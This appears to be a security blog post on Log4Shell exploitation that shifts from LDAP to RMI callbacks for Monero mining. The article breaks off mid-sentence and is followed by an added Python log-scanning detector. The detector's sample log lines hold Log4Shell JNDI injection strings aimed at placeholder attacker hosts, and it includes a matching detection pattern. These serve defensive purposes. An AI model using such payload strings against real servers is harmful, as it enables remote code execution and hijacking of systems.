Monero Miners Injected in Log4j Through RMI

The past few days have been dominated by the most serious vulnerability disclosed in recent memory. The flaw, tracked as CVE-2021-44228 and nicknamed Log4Shell (also LogJam), is an unauthenticated remote code execution vulnerability that allows complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1.

What Is Happening?

As reported by BleepingComputer, some threat actors exploiting the Apache Log4j vulnerability have switched their callback URLs from LDAP to RMI, or have used both in a single request, in order to increase their chances of success.

This is a notable shift in the ongoing campaign, and organizations need to account for it when trying to cover every potential callback channel. So far the pattern has been observed from threat actors hijacking resources for Monero mining, but other groups may follow suit at any time.

LDAP (Lightweight Directory Access Protocol) has been the callback protocol used in the majority of attacks targeting the Log4j "Log4Shell" vulnerability.

At first glance, switching to the RMI (Remote Method Invocation) API appears counter-intuitive, since that path is subject to additional checks and restrictions. That is not always the case, however: if we take into account that some JVM (Java Virtual Machine) versions may not enforce strict rules, RMI might be
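Because defenders who only alert on `ldap://` callbacks will miss the RMI variant and the "both in one request" variant described above, it helps to see what a protocol-agnostic check looks like. The following is an added example (not code from the original article or from BleepingComputer): it scans constructed access-log lines for `${jndi:...}` lookups, records the callback scheme, host and port of each, and flags requests that carry more than one protocol. The log lines, IP addresses and ports are invented for the example.

```python
import re
from collections import Counter

# Constructed sample log lines for this example (not real captures). The attacker
# payload is assumed to land in the logged User-Agent field, which is the last
# quoted value on each line.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [13/Dec/2021:10:01:25 +0000] "GET /login HTTP/1.1" 200 "-" '
    '"${jndi:rmi://198.51.100.7:1099/b}"',
    # The "both in a single request" pattern: LDAP and RMI lookups side by side.
    '10.0.0.7 - - [13/Dec/2021:10:01:30 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a} ${jndi:rmi://198.51.100.7:1099/b}"',
    '10.0.0.8 - - [13/Dec/2021:10:02:01 +0000] "GET /health HTTP/1.1" 200 "-" '
    '"Mozilla/5.0"',
]

# Matches one ${jndi:<scheme>://<host>[:<port>]...} lookup and captures the
# scheme, host and optional port. Case-insensitive as a conservative choice so
# that ${JNDI:...} is not missed. Note: this deliberately simple pattern does not
# unwrap nested lookups such as ${${lower:j}ndi:...}; that obfuscation needs a
# separate normalization step.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi:\s*([a-z]+)://([^/}\s:]+)(?::(\d+))?[^}]*\}",
    re.IGNORECASE,
)


def find_jndi_lookups(line):
    """Return a list of (scheme, host, port) tuples for every JNDI lookup in the line.

    The scheme is lower-cased so 'ldap' and 'LDAP' count as the same protocol;
    the port is None when the URL carries no explicit port.
    """
    return [
        (m.group(1).lower(), m.group(2), m.group(3))
        for m in JNDI_LOOKUP.finditer(line)
    ]


def classify(line):
    """Summarize the JNDI lookups on one log line, or return None if there are none.

    The result records every distinct callback scheme seen and whether the
    request mixes protocols (e.g. LDAP and RMI in the same request).
    """
    lookups = find_jndi_lookups(line)
    if not lookups:
        return None
    schemes = sorted({scheme for scheme, _, _ in lookups})
    return {
        "schemes": schemes,
        "callbacks": [(host, port) for _, host, port in lookups],
        "multi_protocol": len(schemes) > 1,
    }


def summarize(lines):
    """Count callback schemes across a batch of lines and how many mix protocols."""
    scheme_counts = Counter()
    multi_protocol = 0
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        scheme_counts.update(hit["schemes"])
        if hit["multi_protocol"]:
            multi_protocol += 1
    return {"schemes": scheme_counts, "multi_protocol_requests": multi_protocol}


if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        hit = classify(line)
        if hit is not None:
            print("JNDI lookup:", hit)
    print(summarize(SAMPLE_LOG_LINES))
```

The point of matching on the `${jndi:` prefix rather than on a specific scheme is that the callback protocol is the attacker's choice; a rule keyed on `ldap://` alone is exactly what the switch to RMI is designed to slip past. The host and port captured for each lookup are the values to block at the egress firewall and to pivot on when hunting for other hits from the same infrastructure.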

Read More: https://heimdalsecurity.com/blog/monero-miners-injected-in-log4j-through-rmi/